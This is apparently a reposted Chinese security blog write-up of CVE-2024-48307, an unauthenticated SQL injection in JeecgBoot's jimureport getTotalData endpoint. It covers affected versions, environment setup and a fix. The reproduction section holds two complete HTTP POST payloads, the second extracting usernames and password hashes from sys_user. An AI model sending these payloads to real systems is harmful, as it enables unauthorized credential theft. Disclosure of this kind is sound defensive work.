CVE

关注我们❤️，添加星标，一起学安全！ 作者：hexixi@Timeline Sec 本文字数：2248 阅读时长：2～4mins 声明：仅供学习参考使用，请勿用作违法用途，否则后果自负

0x01 简介

JeecgBoot是一款基于BPM的低代码平台！前后端分离架构 SpringBoot 2.x/3.x，SpringCloud，Ant Design&Vue3，Mybatis-plus，Shiro，JWT，支持微服务。具有代码生成器、权限管理、工作流引擎、监控报警、数据大屏等功能，可以帮助开发人员快速搭建企业级应用系统。

0x02 漏洞概述

漏洞编号：CVE-2024-48307

JeecgBoot v3.7.1中的/onlDragDatasetHead/getTotalData组件发现存在SQL注入漏洞。攻击者可以无需权限利用jimureport-dashboard-spring-boot-starter-1.8.1-beta.jar查询数据库，导致数据库信息泄露。

0x03 影响版本

jimureport-spring-boot-starter.version<=1.8.1

0x04 环境搭建

https://github.com/jeecgboot/JeecgBoot/releases

idea部署后端

进入jeecgboot-vue3目录下执行pnpm dev命令开启前端

0x05 漏洞复现

访问http://IP:8080/jeecg-boot/drag/onlDragDatasetHead/getTotalData可以发现服务可用，不能以get方式访问

根据源码构建json数据，尝试访问sys_user表的id

代码语言：javascript

代码运行次数：

0

运行

复制

POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1 Host: IP:8080 User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate, br Accept: */* Connection: close Content-Length: 296 Content-Type: application/json {"tableName": "sys_user", "compName": "test", "condition": {"filter": {}}, "config": {"assistValue": [], "assistType": [], "name": [{"fieldName": "concat(id)", "fieldType": "string"}, {"fieldName": "id", "fieldType": "string"}], "value": [{"fieldName": "id", "fieldType": "string"}], "type": []}}

查询username和password

代码语言：javascript

代码运行次数：

0

运行

复制

POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1 Host: IP:8080 User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate, br Accept: */* Connection: close Content-Type: application/json Content-Length: 311 {"tableName": "sys_user", "compName": "test", "condition": {"filter": {}}, "config": {"assistValue": [], "assistType": [], "name": [{"fieldName": "concat(username,0x3a,password)", "fieldType": "string"}, {"fieldName": "id", "fieldType": "string"}], "value": [{"fieldName": "id", "fieldType": "1"}], "type": []}}

0x06 修复方式

更新插件jimureport到最新版本。

参考链接

https://help.jeecg.com/setup/startup.html

历史漏洞

CNVD-2023-69437 CVE-2023-6307 CVE-2023-4450 CVE-2023-42268 CVE-2023-41578 CVE-2023-41544 CVE-2023-41543 CVE-2023-41542 CVE-2023-40989 CVE-2023-38992 CVE-2023-34659 CVE-2023-34603 CVE-2023-34602 CVE-2023-24789 CVE-2023-1784 CVE-2023-1741 CVE-2023-1454

本文参与 腾讯云自媒体同步曝光计划，分享自微信公众号。

原始发表：2024-11-27

，如有侵权请联系 [email protected] 删除

网址：CVE https://klqsh.com/news/view/235020

相关内容

Realtek 声卡控制台应用程序
人生的哲理
创新科技“上车” 东风奕派美好出行“加速”
电脑锁屏快捷键是哪个？不同系统使用快捷键一键锁屏的方法详解
汇率换算
美国航空母舰

随便看看